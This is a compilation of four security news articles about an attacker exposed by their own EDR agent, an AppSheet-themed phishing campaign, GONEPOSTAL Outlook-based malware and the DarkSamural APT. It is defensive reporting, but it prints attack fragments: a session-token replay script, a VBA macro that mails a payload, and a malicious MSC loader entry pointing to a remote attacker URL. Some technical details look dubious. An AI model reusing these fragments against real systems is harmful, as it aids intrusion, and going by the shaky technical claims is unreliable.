A recent incident uncovered how a threat actor inadvertently exposed its entire operational workflow by installing a popular endpoint detection and response (EDR) agent on their own attacking infrastructure.

The scenario unfolded when the adversary, while evaluating various security platforms, triggered alerts that led Huntress analysts to investigate unusual telemetry data.

Initial observations of system activity and browser history hinted at sophisticated reconnaissance efforts, prompting researchers to delve deeper into the artifacts collected by the EDR system.

Within hours of deployment, the agent recorded a range of interactions indicative of malicious intent.

Huntress analysts noted that the unique machine identifier had appeared in prior compromise investigations, immediately flagging the host as adversarial.

Subsequent correlation of authentication logs and telemetry data revealed patterns of credential theft, session token refreshes, and automated tooling execution.

Researchers identified attempts to access rotated session tokens and found evidence of automated phishing campaigns orchestrated through bespoke scripts.

The impact of this accidental installation cannot be overstated. For the first time, defenders gained granular visibility into the day-to-day routines of a live threat operator, from reconnaissance through to active exploitation.

The threat actor’s day typically began with passive external scanning, later transitioning to targeted exploitation of identified organizations.

Detailed browser history entries showed extensive use of both public and subscription-based services for reconnaissance, as well as the deployment of residential proxy services to anonymize traffic and evade detection.

Over the course of a three-month period, the EDR telemetry captured a clear evolution in the attacker’s workflow.

Early activities focused on researching banking institutions and third-party vendors, whereas later stages revealed the adoption of automated workflows for phishing message generation.

Huntress researchers identified a gradual shift toward more programmatic tool usage, with the adversary scripting repetitive tasks to increase operational efficiency.

Infection Mechanism and Persistence Tactics

A deeper look into the infection mechanism uncovers how the threat actor achieved initial access and maintained a foothold within target environments.

The adversary leveraged stolen session cookies extracted from Telegram Desktop cookie files using a simple Python script. The script, executed via:-

from roadtx import PrtAuth

auth = PrtAuth(token_file="victim_cookie.json")
session = auth.acquire()
print(session)

This reveals how the attacker automated primary refresh token extraction for Microsoft Entra and Office 365 services.

Once valid tokens were obtained, they were used to authenticate into victim accounts without triggering multifactor authentication or alerting endpoint defenses.

Persistence was achieved by deploying scheduled tasks that regularly renewed session tokens and executed reconnaissance scripts. These tasks were registered in the Windows Task Scheduler under inconspicuous names to blend with legitimate processes.

Huntress analysts identified these entries and observed periodic outbound connections to attacker-controlled C2 servers, confirming ongoing control.

This rare visibility into real-world threat actor behavior provided invaluable insights for defenders. By dissecting the infection and persistence techniques, security teams can craft targeted detection rules and harden authentication workflows against similar token-based attacks.

The collaboration between telemetry-driven analysis and manual artifact review underscores the importance of comprehensive EDR solutions in modern security operations.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Threat Actor Installed EDR on Their Systems, Revealing Workflows and Tools Used appeared first on Cyber Security News.

A sophisticated phishing campaign has emerged targeting Google Workspace organizations through fraudulent emails impersonating Google’s AppSheet platform.

The attack demonstrates how cybercriminals exploit legitimate cloud services to bypass traditional email security measures and steal user credentials.

Discovered in September 2025, this campaign represents a significant escalation in social engineering tactics, leveraging the inherent trust organizations place in Google’s no-code application development platform.

The malicious campaign capitalizes on AppSheet’s widespread enterprise adoption and deep integration with Google Workspace infrastructure.

By masquerading as legitimate AppSheet communications, attackers successfully circumvent email authentication protocols while delivering convincing trademark violation notices to unsuspecting recipients.

The attack’s effectiveness stems from its abuse of authentic Google infrastructure, making detection extraordinarily challenging for conventional security systems.

This phishing operation follows a pattern of legitimate service abuse that security researchers have tracked since March 2025, when similar campaigns exploited AppSheet to impersonate Meta and PayPal services.

Raven analysts identified the current trademark violation campaign as an evolution of these earlier tactics, noting how attackers have refined their approach to maximize credential harvesting success rates while maintaining operational security.

The campaign’s most concerning aspect lies in its technical sophistication and authentication bypass capabilities.

Unlike traditional phishing attacks that rely on compromised or spoofed domains, this operation leverages Google’s legitimate email infrastructure to deliver malicious content.

Messages originate from noreply@appsheet.com, ensuring perfect SPF, DKIM, and DMARC authentication while maintaining excellent sender reputation scores.

Technical Infrastructure and Delivery Mechanism

The attack methodology exploits AppSheet’s legitimate email functionality through multiple potential vectors.

Attackers either compromise existing user accounts on the platform or abuse the service’s notification systems to craft messages that appear authentically generated by Google’s infrastructure.

The phishing emails contain professionally formatted content mimicking trademark enforcement notices, complete with urgent legal compliance requirements designed to prompt immediate user action.

Critical to the campaign’s success is its use of suspicious URL shorteners, particularly goo.su domains, which redirect victims to credential harvesting sites.

These shortened links are embedded within otherwise legitimate-appearing legal notifications, creating a compelling pretext for user interaction.

The attackers strategically host their phishing infrastructure on reputable platforms like Vercel, further enhancing the operation’s credibility and evasion capabilities.

Detection proves challenging because the emails pass all traditional authentication checks while appearing contextually appropriate to recipients familiar with routine AppSheet communications.

This combination of technical legitimacy and social engineering sophistication highlights the urgent need for context-aware email security solutions that analyze sender-content relationships rather than relying solely on authentication protocols.

The campaign underscores how legitimate cloud services can become weaponized attack vectors, forcing organizations to reconsider fundamental assumptions about trusted communications in enterprise environments.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post New Phishing Attack Mimics Google AppSheet to Steal Login Credentials appeared first on Cyber Security News.

In recent weeks, security teams have observed a sophisticated new strain of malware—dubbed GONEPOSTAL—that subverts Microsoft Outlook to relay command and control (C2) instructions.

Emerging through spear-phishing campaigns targeting corporate environments, GONEPOSTAL disguises itself as a benign Office document.

Upon opening the weaponized attachment, victims unknowingly activate a multi-stage payload that interfaces directly with Outlook’s COM APIs to send and receive encrypted email messages containing C2 data.

Early indicators suggest the threat actor behind GONEPOSTAL aims to maintain stealth by hiding network traffic within legitimate email flows, undermining traditional perimeter-based defenses.

Kroll analysts noted that the initial compromise vectors rely on social engineering tactics that exploit common workplace behaviors.

The malicious document leverages a heavily obfuscated VBA macro to drop a lightweight launcher executable into the user’s temporary folder.

Once invoked, the launcher dynamically loads additional modules from a remote server, blending in with routine Outlook operations.

These secondary modules parse the victim’s address book to identify likely internal targets for lateral movement, then craft outbound emails with base64-encoded control instructions embedded in image attachments.

Kroll researchers identified that this tactic effectively bypasses most email gateway appliances, as the attachments appear as innocuous company logos or promotional flyers.

In its third phase, GONEPOSTAL establishes persistence by creating a registry entry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, referencing a benign-looking Word document named “Company_Update.docx.”

This document contains a hidden OLE object that, when opened by the victim via Outlook preview, re-executes the payload without raising any security prompts.

Further, the malware writes a DLL into the AppData\Roaming\Microsoft\Outlook directory and registers it with Outlook’s add-ins framework, ensuring that every instance of Outlook automatically loads the malicious component on startup.

Victims typically remain unaware of the residence of the threat, as the add-in manifests under the name “OfficeUpdate.”

The impact of GONEPOSTAL has been significant. Multiple mid-sized enterprises in North America have reported unexplained outbound email traffic spikes, matched by credential theft and unauthorized file transfers.

Security teams investigating anomalous SMTP sessions uncovered encrypted JSON blobs masquerading as inline images, which—after decryption—revealed system reconnaissance data and remote shell commands.

This dynamic C2 channel enables the adversaries to query registry keys, manipulate files, and pivot to domain controllers, all while evading standard detection signatures.

Infection Mechanism

A closer examination of GONEPOSTAL’s infection mechanism reveals the campaign’s reliance on a cleverly crafted VBA macro embedded within a booby-trapped document.

The macro code, heavily obfuscated to conceal its true purpose, begins by declaring Outlook COM object references:-

Dim OutlookApp As Object
Set OutlookApp = CreateObject("Outlook.Application")
Dim MailItem As Object
Set MailItem = OutlookApp.CreateItem(0)
MailItem.To = recipientAddress
MailItem.Subject = "Monthly Report"
MailItem.Attachments.Add payloadPath
MailItem.Send

Once executed, this snippet not only dispatches the initial payload but also schedules follow-up tasks via the Windows Task Scheduler, ensuring that Outlook remains the primary conduit for ongoing command orchestration.

By leveraging native Windows and Office components, GONEPOSTAL sidesteps external dependencies, making it especially challenging to pinpoint through conventional network monitoring tools.

The infection chain culminates with the installation of a stealthy Outlook add-in, allowing the attacker to harvest sent and received emails, covertly modify message content, and issue new C2 commands without user awareness.

This modular design demonstrates a high degree of operational maturity, indicating that the threat actor is well-versed in blending malicious activity into everyday user workflows.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post New GONEPOSTAL Malware Hijacking Outlook to Enable Command and Control Communication appeared first on Cyber Security News.

Security researchers have observed a sophisticated campaign in recent weeks targeting critical infrastructure and government entities across South Asia.

Dubbed the DarkSamural operation, this attack chain leverages deceptively crafted LNK and PDF files to infiltrate networks, establish persistence, and exfiltrate sensitive information.

Initial reconnaissance indicates that the adversaries disguise malicious MSC (Microsoft Management Console) files with familiar PDF icons, enticing recipients to inadvertently launch embedded scripts.

As the campaign unfolds, stolen credentials and system metadata flow back to the attackers’ command-and-control servers, enabling further lateral movement.

The infection begins with a spear-phishing email containing a compressed archive. Recipients are presented with a file named Drone_Information.pdf[.]msc, which, despite its PDF-like appearance, executes when double-clicked.

Ctfiot analysts noted that these MSC files employ GrimResource technology to unpack and run obfuscated JavaScript, which in turn downloads a second-stage payload.

This multi-layered approach impedes signature-based detection, as each stage appears benign until deobfuscation occurs.

Researchers identified that the malicious script contacts a remote URL and retrieves a disguised DLL, eventually stored under C:\ProgramData\DismCore[.]dll for subsequent execution.

By the third paragraph, it becomes evident that DarkSamural’s impact extends beyond initial access.

Victims have reported unauthorized file transfers, browser credential theft, and even remote shell access.

The combination of open-source and proprietary RATs—including Mythic, QuasarRat, and BADNEWS—grants the attackers versatile control over compromised machines.

Files harvested range from administrative documents to proprietary research, underscoring the campaign’s strategic focus on exfiltrating high-value targets.

Further analysis reveals that the malicious DLL embeds an export function, DIIRegisterServer, which dynamically resolves critical Windows APIs.

Upon execution, the sample gathers host details such as machine name, user account, and process ID, packaging them into a JSON check-in packet.

This packet is encrypted with AES-128-GCM and transmitted to the C2 endpoint over WinHTTP. The resulting network artifacts mimic legitimate update traffic, complicating anomaly detection.

Infection Mechanism and Obfuscation

A closer examination of the MSC file’s internal structure uncovers a multi-layered obfuscation scheme designed to thwart reverse engineering.

The initial JavaScript code, embedded in an XML StringTable, triggers an XSL transformation that launches mmc[.]exe with a remote script reference.

<StringTable>
  <GUID> {71E5B33E-1064-11D2-808F-0000F875A9CE} </GUID>
  <Strings>
    <String ID="14"> https[:]//caapakistaan[.]com/.../Unit-942-Drone-Info-MAK3[.]html </String>
  </Strings>
</StringTable>

After fetching the second layer, the script reverses character sequences, substitutes tokens, converts to hexadecimal, and performs Base64 decoding to produce the final DLL.

The decoding routine exemplifies this transformation in Python:-

def decode (str):
    b = list (str)
    c = ''[.]join (b[::-1]) [.]replace("$", "4") [.]replace ("!", "1")
    d = ''[.]join ([chr (int (c [i:i+2], 16)) for i in range (0, len (c), 2)])
    return base64[.]b64decode (d)

Subsequently, the decoded bytes are written to disk and registered as a COM server, ensuring execution on system startup.

This layered obfuscation, combined with scheduled task creation, illustrates DarkSamural’s meticulous approach to infection and evasion.

Cybersecurity teams should inspect MSC file behavior, monitor anomalous mmc[.]exe invocations, and validate script-based downloads against known artifact hashes to detect and disrupt this campaign.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post DarkSamural APT Group Malicious LNK and PDF Files to Steal Critical Data appeared first on Cyber Security News.